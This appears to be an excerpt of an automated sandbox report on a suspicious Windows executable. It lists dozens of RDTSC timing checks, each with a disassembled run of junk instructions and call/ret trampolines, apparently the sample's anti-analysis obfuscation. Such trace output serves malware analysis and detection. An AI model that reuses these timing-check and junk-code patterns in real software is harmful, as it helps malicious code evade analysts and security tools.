Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C4035F second address: C40406 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F07E8CE6A86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F07E8CE6A88h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F07E8CE6A97h 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F07E8CE6A88h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 jmp 00007F07E8CE6A8Ch 0x00000039 push ecx 0x0000003a mov edi, dword ptr [ebp+122D36A7h] 0x00000040 pop edi 0x00000041 push 00000000h 0x00000043 mov dword ptr [ebp+12467B46h], ecx 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push esi 0x0000004e call 00007F07E8CE6A88h 0x00000053 pop esi 0x00000054 mov dword ptr [esp+04h], esi 0x00000058 add dword ptr [esp+04h], 0000001Ch 0x00000060 inc esi 0x00000061 push esi 0x00000062 ret 0x00000063 pop esi 0x00000064 ret 0x00000065 mov edi, dword ptr [ebp+122D363Fh] 0x0000006b push eax 0x0000006c pushad 0x0000006d jg 00007F07E8CE6A92h 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C42034 second address: C42039 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C43547 second address: C435DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov dword ptr [esp], eax 0x0000000d cmc 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F07E8CE6A88h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F07E8CE6A88h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 mov esi, dword ptr [ebp+122D2799h] 0x0000004c call 00007F07E8CE6A94h 0x00000051 sbb si, 4D51h 0x00000056 pop edi 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b jmp 00007F07E8CE6A8Ch 0x00000060 je 00007F07E8CE6A86h 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C43281 second address: C43286 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C44005 second address: C4400A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C453C2 second address: C453C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C453C6 second address: C453D0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C4842F second address: C48433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C4B900 second address: C4B9A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F07E8CE6A88h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007F07E8CE6A88h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 add edi, dword ptr [ebp+122D361Fh] 0x00000049 push ebx 0x0000004a call 00007F07E8CE6A8Fh 0x0000004f mov edi, dword ptr [ebp+124824BAh] 0x00000055 pop ebx 0x00000056 pop ebx 0x00000057 push 00000000h 0x00000059 xchg eax, esi 0x0000005a jo 00007F07E8CE6AA2h 0x00000060 jl 00007F07E8CE6A9Ch 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b jnl 00007F07E8CE6A86h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C4B9A2 second address: C4B9B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A962h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C4AB22 second address: C4ABDC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F07E8CE6A86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c jno 00007F07E8CE6A8Eh 0x00000012 nop 0x00000013 mov ebx, dword ptr [ebp+122D370Fh] 0x00000019 push dword ptr fs:[00000000h] 0x00000020 jmp 00007F07E8CE6A8Dh 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F07E8CE6A88h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 mov bl, 7Bh 0x00000048 mov eax, dword ptr [ebp+122D1505h] 0x0000004e push 00000000h 0x00000050 push eax 0x00000051 call 00007F07E8CE6A88h 0x00000056 pop eax 0x00000057 mov dword ptr [esp+04h], eax 0x0000005b add dword ptr [esp+04h], 00000019h 0x00000063 inc eax 0x00000064 push eax 0x00000065 ret 0x00000066 pop eax 0x00000067 ret 0x00000068 jno 00007F07E8CE6AA0h 0x0000006e push FFFFFFFFh 0x00000070 mov ebx, dword ptr [ebp+122D381Fh] 0x00000076 nop 0x00000077 push eax 0x00000078 pushad 0x00000079 jnp 00007F07E8CE6A86h 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C4BADA second address: C4BBB7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F07E8D7A967h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F07E8D7A964h 0x00000012 jmp 00007F07E8D7A962h 0x00000017 popad 0x00000018 nop 0x00000019 mov edi, 27CF19F4h 0x0000001e push dword ptr fs:[00000000h] 0x00000025 adc ebx, 53F262CEh 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov dword ptr [ebp+122D2852h], edx 0x00000038 mov eax, dword ptr [ebp+122D14F5h] 0x0000003e mov dword ptr [ebp+1246F61Dh], edx 0x00000044 call 00007F07E8D7A966h 0x00000049 mov ebx, 7D596182h 0x0000004e pop ebx 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push esi 0x00000054 call 00007F07E8D7A958h 0x00000059 pop esi 0x0000005a mov dword ptr [esp+04h], esi 0x0000005e add dword ptr [esp+04h], 0000001Ah 0x00000066 inc esi 0x00000067 push esi 0x00000068 ret 0x00000069 pop esi 0x0000006a ret 0x0000006b mov edi, dword ptr [ebp+122D38B3h] 0x00000071 jmp 00007F07E8D7A95Fh 0x00000076 nop 0x00000077 pushad 0x00000078 pushad 0x00000079 jmp 00007F07E8D7A961h 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C4D97A second address: C4D97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C4BBB7 second address: C4BBBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C4D97F second address: C4D9DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F07E8CE6A88h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov dword ptr [ebp+12465DB4h], esi 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F07E8CE6A88h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 push 00000000h 0x00000049 mov ebx, esi 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jne 00007F07E8CE6A8Ch 0x00000054 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C4D9DF second address: C4D9E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C4F8EF second address: C4F8F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C4F8F3 second address: C4F903 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A95Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C4F903 second address: C4F909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C4F909 second address: C4F933 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jnc 00007F07E8D7A959h 0x0000000f push 00000000h 0x00000011 sub bl, 0000004Fh 0x00000014 push 00000000h 0x00000016 jg 00007F07E8D7A95Ah 0x0000001c xchg eax, esi 0x0000001d pushad 0x0000001e pushad 0x0000001f push edx 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C4F933 second address: C4F946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jg 00007F07E8CE6A86h 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C517E1 second address: C517FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jc 00007F07E8D7A96Dh 0x0000000c pushad 0x0000000d jmp 00007F07E8D7A95Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C52873 second address: C52882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F07E8CE6A86h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C52882 second address: C52886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C538BE second address: C538C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C51943 second address: C51950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F07E8D7A956h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C538C4 second address: C538EF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F07E8CE6A8Ch 0x00000008 jbe 00007F07E8CE6A86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F07E8CE6A98h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C538EF second address: C538F4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C548AF second address: C548C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F07E8CE6A91h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C53AB3 second address: C53AB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C548C4 second address: C548C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C53AB8 second address: C53AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F07E8D7A956h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F07E8D7A958h 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C53BD6 second address: C53BDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C53BDC second address: C53BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C55A52 second address: C55A58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C55A58 second address: C55A5D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C56AD8 second address: C56AE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C55BE7 second address: C55C80 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007F07E8D7A956h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ebx, ecx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F07E8D7A958h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 mov edi, dword ptr [ebp+12468471h] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f xor ebx, dword ptr [ebp+124776C6h] 0x00000045 sub dword ptr [ebp+122D255Ch], ecx 0x0000004b mov eax, dword ptr [ebp+122D0745h] 0x00000051 mov dword ptr [ebp+122D2309h], edi 0x00000057 jne 00007F07E8D7A958h 0x0000005d push FFFFFFFFh 0x0000005f push 00000000h 0x00000061 push ebx 0x00000062 call 00007F07E8D7A958h 0x00000067 pop ebx 0x00000068 mov dword ptr [esp+04h], ebx 0x0000006c add dword ptr [esp+04h], 00000014h 0x00000074 inc ebx 0x00000075 push ebx 0x00000076 ret 0x00000077 pop ebx 0x00000078 ret 0x00000079 mov edi, dword ptr [ebp+122D2768h] 0x0000007f mov edi, dword ptr [ebp+12477653h] 0x00000085 push eax 0x00000086 pushad 0x00000087 push eax 0x00000088 push edx 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C55C80 second address: C55C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C57B5F second address: C57B64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C57B64 second address: C57BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07E8CE6A8Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F07E8CE6A88h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 sub dword ptr [ebp+1246096Ch], esi 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F07E8CE6A88h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000019h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 push 00000000h 0x0000004b movsx edi, bx 0x0000004e xchg eax, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F07E8CE6A92h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C57BDE second address: C57BF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8D7A960h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C57BF7 second address: C57C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C57DBF second address: C57DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07E8D7A968h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jnc 00007F07E8D7A956h 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C57DE7 second address: C57DF1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F07E8CE6A8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C5C34C second address: C5C350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C5C350 second address: C5C354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C5EEBC second address: C5EEC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C5EEC0 second address: C5EED0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F07E8CE6A8Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C5F341 second address: C5F347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C5F347 second address: C5F35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F07E8CE6A90h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C5F35E second address: C5F369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F07E8D7A956h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C638EA second address: C638EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C638EE second address: C638F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C6A761 second address: C6A767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C6A767 second address: C6A76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C6A76B second address: C6A79C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F07E8CE6A8Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jp 00007F07E8CE6A86h 0x00000016 jmp 00007F07E8CE6A93h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C6A79C second address: C6A7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C6A7A1 second address: C6A7A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C6A7A7 second address: C6A7C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F07E8D7A95Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C69CD8 second address: C69CF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F07E8CE6A96h 0x00000007 jg 00007F07E8CE6A8Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C6A356 second address: C6A35C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C6A35C second address: C6A360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C04047 second address: C0404D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C0404D second address: C04056 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C6F675 second address: C6F679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C6F7C0 second address: C6F7D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F07E8CE6A86h 0x0000000a popad 0x0000000b jl 00007F07E8CE6A92h 0x00000011 jnl 00007F07E8CE6A86h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C6FBE0 second address: C6FC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F07E8D7A956h 0x0000000a popad 0x0000000b push ecx 0x0000000c jc 00007F07E8D7A956h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F07E8D7A964h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C6FC0D second address: C6FC11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	RDTSC instruction interceptor: First address: C6FD66 second address: C6FD6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
